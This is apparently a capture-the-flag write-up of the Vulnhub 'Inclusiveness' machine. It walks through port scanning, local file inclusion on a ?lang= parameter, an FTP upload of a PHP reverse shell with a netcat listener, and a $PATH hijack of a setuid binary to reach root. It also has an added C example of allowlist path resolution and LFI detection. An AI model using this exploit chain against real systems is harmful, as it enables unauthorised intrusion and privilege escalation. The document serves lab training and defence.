[VLN] Inclusiveness

Today we are going to hack the Vulnhub machine called Inclusiveness. You can download it from the following link: https://www.vulnhub.com/entry/inclusiveness-1,422/
  • Enumeration
We start with an nmap scan to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.96
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 11:27 CEST
    Nmap scan report for inclusiveness.home (192.168.1.96)
    Host is up (0.00036s latency).
    Not shown: 65532 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub [NSE: writeable]
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.148
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 1
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
    | ssh-hostkey:
    |   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
    |   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
    |_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Apache2 Debian Default Page: It works
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.96 seconds
We can see that we can log in to the FTP server as anonymous and that there is only one folder, called "pub".
    sml@Cassandra:~$ ftp 192.168.1.96
    Connected to 192.168.1.96.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.96:sml): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub
    226 Directory send OK.
    ftp> cd pub
    250 Directory successfully changed.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    226 Directory send OK.
    ftp>
Apache only serves the default page. When we try to look at /robots.txt we get the following message: "You are not a search engine! You can't read my robots.txt!" We use curl to spoof the user-agent so the server thinks we are a search engine:
    sml@Cassandra:~$ curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" -v $@ http://192.168.1.96/robots.txt
    *   Trying 192.168.1.96:80...
    * TCP_NODELAY set
    * Connected to 192.168.1.96 (192.168.1.96) port 80 (#0)
    > GET /robots.txt HTTP/1.1
    > Host: 192.168.1.96
    > User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)
    > Accept: */*
    >
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Date: Mon, 30 Mar 2020 09:27:26 GMT
    < Server: Apache/2.4.38 (Debian)
    < Last-Modified: Sat, 08 Feb 2020 03:26:11 GMT
    < ETag: "2d-59e08115bb1ef"
    < Accept-Ranges: bytes
    < Content-Length: 45
    < Content-Type: text/plain
    <
    User-agent: *
    Disallow: /secret_information/
    * Connection #0 to host 192.168.1.96 left intact
It returns: Disallow: /secret_information/. At http://192.168.1.96/secret_information/ there is a page with some text and two links; clicking either of them appends ?lang=en or ?lang=es to the end of the URL, so we test whether the ?lang= parameter is vulnerable to LFI. We can use fi-cyberspace-scan[1].
    sml@Cassandra:~/tools/fi-cyberspace-scan$ python fi-cyberscan.py -t http://192.168.1.96/secret_information/?lang= -m 3
    -----------------------------------------------------------------
                          FI Cyberspace-Scan
    -----------------------Hardwired Options-------------------------
    TARGET URL             : http://192.168.1.96/secret_information/?lang=
    CYBER ATTACK MODE      : Kuang-Grade-Mark-11
    PATH TYPE              : ../
    DEEP SPACE TRAVERSAL   : False
    NULL-BYTE %00          : False
    -----------------------------------------------------------------
    DO NOT USE AGAINST UNAUTHORIZED INTRUSION COUNTERMEASURE ELECTRONICS
    Execute Cyberspace Run? [Y/n]:
    -----------------------------------------------------------------
    It seems 146 is the common reflected byte size.
    Digging into unique reflection sizes.
    -----------------------------------------------------------------
    [+] - Something interesting found with proc/self/cmdline in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with proc/self/stat in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/issue in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/motd in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/passwd in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/group in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/mysql/my.cnf in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/vsftpd.conf in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with etc/fstab in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with proc/self/cmdline in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with proc/self/stat in
          --Path: /
          --Path: ../../../../
    [+] - Something interesting found with proc/self/status in
          --Path: /
          --Path: ../../../../
    -----------------------------------------------------------------
    Cyber Run Status: COMPLETE
    -----------------------------------------------------------------
It is vulnerable to LFI and we can read the contents of several files. If we look at the contents of /etc/vsftpd.conf (http://192.168.1.96/secret_information/?lang=etc/vsftpd.conf) we can see it contains the line anon_root=/var/ftp/. That means that when we upload something to the FTP server as the anonymous user (whose folder is pub), we are really writing it to /var/ftp/pub. Knowing this, we can upload the usual php-reverse-shell and use the LFI to execute it.
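As an added example (it is not code from this post or from the Inclusiveness VM), here is how a ?lang= parameter should be resolved on the server side so that the traversal above does not work: the value is mapped onto a fixed allowlist instead of being concatenated into an include path, and a small pattern check is included that a defender can reuse for a WAF rule or when reviewing access logs. It is written in C to sit beside the C program later on this page; the directory /var/www/html/secret_information/lang/ and the file names en.php and es.php are assumptions about the layout, not taken from the VM.

```c
/* Added example, not the VM's code: safe resolution of a ?lang= value.
 * The vulnerable page evidently passes the raw parameter into an include,
 * so ?lang=../../../../etc/passwd reads a file and
 * ?lang=/var/ftp/pub/webshell.php executes one.  Never build the path
 * from user input: map the value onto an allowlist and reject the rest. */
#include <stdio.h>
#include <string.h>

/* Assumed layout for the demo; not the real VM paths. */
#define LANG_DIR "/var/www/html/secret_information/lang/"

/* Fixed mapping of accepted language codes to the files they select. */
static const struct { const char *code; const char *file; } LANGS[] = {
    { "en", "en.php" },
    { "es", "es.php" },
};

/* Returns 1 and writes the resolved path into out if lang is on the
 * allowlist; returns 0 (out untouched) for anything else.  The comparison
 * is exact, so "en/../x", "EN" or "en%00" all fail. */
int resolve_lang(const char *lang, char *out, size_t outlen)
{
    if (lang == NULL)
        return 0;
    for (size_t i = 0; i < sizeof LANGS / sizeof LANGS[0]; i++) {
        if (strcmp(lang, LANGS[i].code) == 0) {
            int n = snprintf(out, outlen, "%s%s", LANG_DIR, LANGS[i].file);
            return n > 0 && (size_t)n < outlen;
        }
    }
    return 0;
}

/* Detection helper, independent of the allowlist: does a request value
 * look like a traversal or arbitrary-path include attempt?  A language
 * code never legitimately contains a slash, "..", an encoded dot or a
 * null byte, so any of those is worth flagging in logs or a WAF rule. */
int looks_like_lfi(const char *value)
{
    if (value == NULL)
        return 0;
    if (strchr(value, '/') != NULL)          /* "etc/passwd", "/var/ftp/..." */
        return 1;
    if (strstr(value, "..") != NULL)         /* "../../../../" traversal */
        return 1;
    if (strstr(value, "%2e") != NULL || strstr(value, "%2E") != NULL)
        return 1;                            /* URL-encoded dot */
    if (strstr(value, "%00") != NULL)        /* null-byte truncation */
        return 1;
    return 0;
}

int main(void)
{
    /* Constructed sample values, including the ones used in this post. */
    const char *samples[] = { "en", "es", "../../../../etc/passwd",
                              "/var/ftp/pub/webshell.php", "etc/vsftpd.conf" };
    char path[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (resolve_lang(samples[i], path, sizeof path))
            printf("%-28s -> include %s\n", samples[i], path);
        else
            printf("%-28s -> rejected%s\n", samples[i],
                   looks_like_lfi(samples[i]) ? " (LFI pattern)" : "");
    }
    return 0;
}
```

The allowlist is the actual fix; looks_like_lfi() only adds visibility. With the first in place, every value that the scanner above tried (etc/vsftpd.conf, ../../../../etc/passwd, proc/self/status and so on) is rejected before any file system access, and with the second the same requests stand out in the web server log as something to investigate.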
  • Exploitation
    sml@Cassandra:/usr/share/webshells/php$ cp php-reverse-shell.php /home/sml/webshell.php
    sml@Cassandra:~$ nano webshell.php   # change the IP and port
    sml@Cassandra:~$ ftp 192.168.1.96
    Connected to 192.168.1.96.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.96:sml): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> cd pub
    250 Directory successfully changed.
    ftp> put webshell.php
    local: webshell.php remote: webshell.php
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    5495 bytes sent in 0.00 secs (201.5554 MB/s)
    ftp>
Now that we have uploaded php-reverse-shell.php, we run the following in a terminal:

    nc -nlvp 5555

And we visit http://192.168.1.96/secret_information/?lang=/var/ftp/pub/webshell.php. We have a shell :)
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.96] 43170
    Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
     20:16:40 up 52 min,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $
  • Privilege Escalation
In /home/tom we can see an executable called rootshell with the setuid bit set and root as owner and group; if we could get it to run for us, we would obtain root privileges. We can see its source code in rootshell.c:
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>

    int main() {
        printf("checking if you are tom...\n");
        FILE* f = popen("whoami", "r");   /* "whoami" is looked up through the caller's $PATH */
        char user[80];
        fgets(user, 80, f);
        printf("you are: %s\n", user);
        //printf("your euid is: %i\n", geteuid());
        if (strncmp(user, "tom", 3) == 0) {
            printf("access granted.\n");
            setuid(geteuid());
            execlp("sh", "sh", (char *) 0);   /* "sh" is also resolved through $PATH */
        }
    }
Basically what it does is run whoami and check whether the output is "tom"; if it is, we get root privileges. The program does not use the absolute path to whoami, which lets us modify the $PATH variable and create a script called whoami that prints "tom" when executed, so that running the program gives us a root shell.
    $ cd /tmp
    $ echo "echo tom" > whoami
    $ chmod +x whoami
    $ echo $PATH
    /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    $ export PATH=/tmp:$PATH
    $ echo $PATH
    /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    $ cd /home/tom
    $ ./rootshell
    checking if you are tom...
    you are: tom
    access granted.
    # id
    uid=0(root) gid=33(www-data) groups=33(www-data)
    # cd /root
    # ls
    flag.txt
    # cat flag.txt
    |\---------------\
    ||              |
    ||  UQ Cyber Squad |
    ||              |
    |\~~~~~~~~~~~~~~~\
    |
    |
    |
    |
    o

    flag{omg_you_did_it_YAY}
    #
  • End
And with that we are root on the machine :)

[1] https://github.com/rtcrowley/fi-cyberspace-scan